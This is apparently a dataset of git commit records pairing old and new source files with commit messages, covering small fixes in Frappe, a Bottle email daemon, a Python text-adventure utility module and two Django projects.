Fix in Blog Category Naming
|
Fix in Blog Category Naming
|
Python
|
mit
|
aboganas/frappe,RicardoJohann/frappe,gangadharkadam/letzfrappe,mbauskar/omnitech-demo-frappe,mhbu50/frappe,BhupeshGupta/frappe,gangadhar-kadam/laganfrappe,gangadharkadam/letzfrappe,shitolepriya/test-frappe,shitolepriya/test-frappe,mbauskar/tele-frappe,gangadharkadam/letzfrappe,gangadhar-kadam/laganfrappe,mbauskar/omnitech-frappe,aboganas/frappe,saguas/frappe,indictranstech/phr-frappe,pawaranand/phr_frappe,indictranstech/trufil-frappe,bcornwellmott/frappe,pombredanne/frappe,saurabh6790/test-frappe,rkawale/Internalhr-frappe,gangadhar-kadam/verve_live_frappe,gangadhar-kadam/helpdesk-frappe,rohitwaghchaure/vestasi-frappe,aboganas/frappe,ScorpionResponse/freelancefinder,mbauskar/Das_frappe,vCentre/vFRP-6233,gangadharkadam/stfrappe,gangadharkadam/v6_frappe,mbauskar/phr-frappe,indictranstech/trufil-frappe,saguas/frappe,indictranstech/phr-frappe,gangadharkadam/saloon_frappe,pranalik/frappe-bb,almeidapaulopt/frappe,indictranstech/Das_frappe,indictranstech/fbd_frappe,chdecultot/frappe,bohlian/frappe,Tejal011089/digitales_frappe,sbkolate/sap_frappe_v6,rohitw1991/smarttailorfrappe,sbktechnology/trufil-frappe,rohitwaghchaure/frappe-digitales,gangadharkadam/smrtfrappe,indictranstech/internal-frappe,rohitwaghchaure/vestasi-frappe,gangadhar-kadam/helpdesk-frappe,RicardoJohann/frappe,ShashaQin/frappe,gangadharkadam/office_frappe,mbauskar/tele-frappe,vjFaLk/frappe,pranalik/frappe-bb,praba230890/frappe,MaxMorais/frappe,rohitwaghchaure/frappe-alec,rohitwaghchaure/New_Theme_frappe,frappe/frappe,almeidapaulopt/frappe,indictranstech/Das_frappe,indictranstech/fbd_frappe,chdecultot/frappe,anandpdoshi/frappe,nerevu/frappe,mbauskar/omnitech-demo-frappe,vjFaLk/frappe,mbauskar/tele-frappe,gangadharkadam/saloon_frappe_install,jevonearth/frappe,elba7r/builder,indictranstech/reciphergroup-frappe,geo-poland/frappe,yashodhank/frappe,suyashphadtare/sajil-frappe,rmehta/frappe,indictranstech/fbd_frappe,indictranstech/fbd_frappe,gangadhar-kadam/verve_frappe,ashokrajbathu/secondrep,mbauskar/helpdesk-frappe,jevonearth/frappe,ShashaQin/frappe,bohlian/frappe,mbauskar/omnitech-frappe,almeidapaulopt/frappe,vqw/frappe,gangadharkadam/letzfrappe,rohitwaghchaure/frappe,gangadharkadam/letzfrappe,gangadharkadam/shfr,gangadharkadam/johnfrappe,gangadhar-kadam/laganfrappe,rohitwaghchaure/frappe-digitales,saurabh6790/test-frappe,RicardoJohann/frappe,sbktechnology/sap_frappe,sbktechnology/sap_frappe,indictranstech/trufil-frappe,gangadharkadam/tailorfrappe,rohitw1991/frappe,pawaranand/phr-frappe,vjFaLk/frappe,gangadharkadam/frappecontribution,indictranstech/omnitech-frappe,bohlian/frappe,indictranstech/tele-frappe,chdecultot/frappe,rohitwaghchaure/frappe,sbkolate/sap_frappe_v6,elba7r/builder,indictranstech/omnitech-frappe,gangadharkadam/shfr,bcornwellmott/frappe,hernad/frappe,saurabh6790/frappe,indictranstech/Das_frappe,nerevu/frappe,vCentre/vFRP-6233,reachalpineswift/frappe-bench,manassolanki/frappe,indictranstech/frappe-digitales,mbauskar/helpdesk-frappe,indictranstech/frappe-digitales,anandpdoshi/frappe,erpletzerp/letzerpcore,chdecultot/frappe,gangadhar-kadam/hrfrappe,gangadharkadam/v4_frappe,BhupeshGupta/frappe,jevonearth/frappe,indictranstech/reciphergroup-frappe,maxtorete/frappe,pombredanne/frappe,rohitw1991/smartfrappe,saurabh6790/phr-frappe,rohitwaghchaure/vestasi-frappe,frappe/frappe,gangadhar-kadam/verve_live_frappe,ESS-LLP/frappe,gangadharkadam/vervefrappe,saurabh6790/frappe,elba7r/builder,saurabh6790/phr-frappe,indictranstech/omnitech-frappe,hernad/frappe,gangadharkadam/saloon_frappe_install,saurabh6790/frappe,elba7r/frameworking,adityahase/frappe,vqw/frappe,gangadhar-kadam/verve_frappe,gangadhar-kadam/smrterpfrappe,pawaranand/phr_frappe,rkawale/Internalhr-frappe,paurosello/frappe,reachalpineswift/frappe-bench,geo-poland/frappe,mhbu50/frappe,elba7r/frameworking,indictranstech/phr-frappe,neilLasrado/frappe,gangadharkadam/v5_frappe,hatwar/buyback-frappe,paurosello/frappe,indictranstech/frappe-digitales,tmimori/frappe,hernad/frappe
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
Fix in Blog Category Naming
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
<commit_before># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
<commit_msg>Fix in Blog Category Naming<commit_after>
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
Fix in Blog Category Naming# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
<commit_before># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
<commit_msg>Fix in Blog Category Naming<commit_after># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
3ec2cc49a68894572f2eafc9172f4140791b6fc5
|
sremailer.py
|
sremailer.py
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
Add logging to email daemon
|
Add logging to email daemon
|
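One operational note on the added logging.debug() calls: with a stock logging setup they are discarded, because the root logger defaults to the WARNING level. In this daemon, stoneridge.StreamLogger.bottle_inject() presumably wires up the handlers; a standalone equivalent, as a sketch, is:

import logging

# Without a handler at DEBUG level, logging.debug() output is silently dropped.
logging.basicConfig(
    level=logging.DEBUG,
    format="%(asctime)s %(levelname)s %(message)s",
)
logging.debug("handling email")  # now reaches stderr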
Python
|
mpl-2.0
|
mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
Add logging to email daemon
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
<commit_before>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
<commit_msg>Add logging to email daemon<commit_after>
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
Add logging to email daemon#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
<commit_before>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
<commit_msg>Add logging to email daemon<commit_after>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
37bedf8495834f0773f8a082c3f358321ebb8f77
|
src/utils.py
|
src/utils.py
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
Fix @DaVinci789's crappy spelling >:)
|
Fix @DaVinci789's crappy spelling >:)
|
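The rename fixes the spelling, but note that both versions keep the letters inside a one-element list, and the patched ['a e i o u'].split(' ') would raise AttributeError, since split() is a str method, not a list method. A working variant of the same idea, splitting the string itself (a sketch, not the repository's code):

vowels = 'a e i o u'.split(' ')
consonants = ('b c d f g h j k l m n p q r s t v w x y z '
              '1 2 3 4 5 6 7 8 9 0').split(' ')

def getIndefArticle(noun):
    # noun[0] is a single character, matched against the one-character
    # tokens produced by split(' ') above.
    if noun[0] in vowels:
        return 'an'
    elif noun[0] in consonants:
        return 'a'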
Python
|
mit
|
allanburleson/python-adventure-game,disorientedperson/python-adventure-game
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
Fix @DaVinci789's crappy spelling >:)
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
<commit_before>import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
<commit_msg>Fix @DaVinci789's crappy spelling >:)<commit_after>
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
Fix @DaVinci789's crappy spelling >:)import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
<commit_before>import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
<commit_msg>Fix @DaVinci789's crappy spelling >:)<commit_after>import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
5f73fd983caa758a77f0fd823425057bd8b36204
|
devproject/devproject/urls.py
|
devproject/devproject/urls.py
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
Fix deprecation re url patterns
|
Fix deprecation re url patterns
|
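For background (version numbers from Django's release notes): django.conf.urls.patterns() was deprecated in Django 1.8 and removed in 1.10, so urlpatterns is simply a list of url() entries and extra routes are appended with ordinary list concatenation. A minimal standalone urls.py sketch:

from django.conf import settings
from django.conf.urls import include, url

urlpatterns = [
    # ... project routes ...
]

if settings.DEBUG:
    import debug_toolbar
    # Plain list concatenation replaces the removed patterns('') wrapper.
    urlpatterns += [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ]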
Python
|
mit
|
philgyford/django-ditto,philgyford/django-ditto,philgyford/django-ditto
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
Fix deprecation re url patterns
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
<commit_before>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
<commit_msg>Fix deprecation re url patterns<commit_after>
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
Fix deprecation re url patternsfrom django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
<commit_before>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
<commit_msg>Fix deprecation re url patterns<commit_after>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
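A note on the change this record captures: Django deprecated the `patterns()` helper in 1.8 and removed it in 1.10, so a urlconf is just a Python list that can be extended with `+=`. A minimal sketch of the modern form, assuming a configured Django 1.9-era project with django-debug-toolbar installed (mirroring the commit's own imports):

from django.conf import settings
from django.conf.urls import include, url

urlpatterns = [
    # ... regular url() entries ...
]

if settings.DEBUG:
    import debug_toolbar
    # patterns('', ...) is gone; extend the plain list instead.
    urlpatterns += [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ]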
b57a2e184e3861617c12801529295b0095257cd9
|
petition/resources.py
|
petition/resources.py
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
Fix swappable model in signature export
|
Fix swappable model in signature export
|
Python
|
mit
|
watchdogpolska/django-one-petition,watchdogpolska/django-one-petition,watchdogpolska/django-one-petition
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
Fix swappable model in signature export
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
<commit_before>from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
<commit_msg>Fix swappable model in signature export<commit_after>
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
Fix swappable model in signature exportfrom import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
<commit_before>from import_export import resources
from .models import Signature
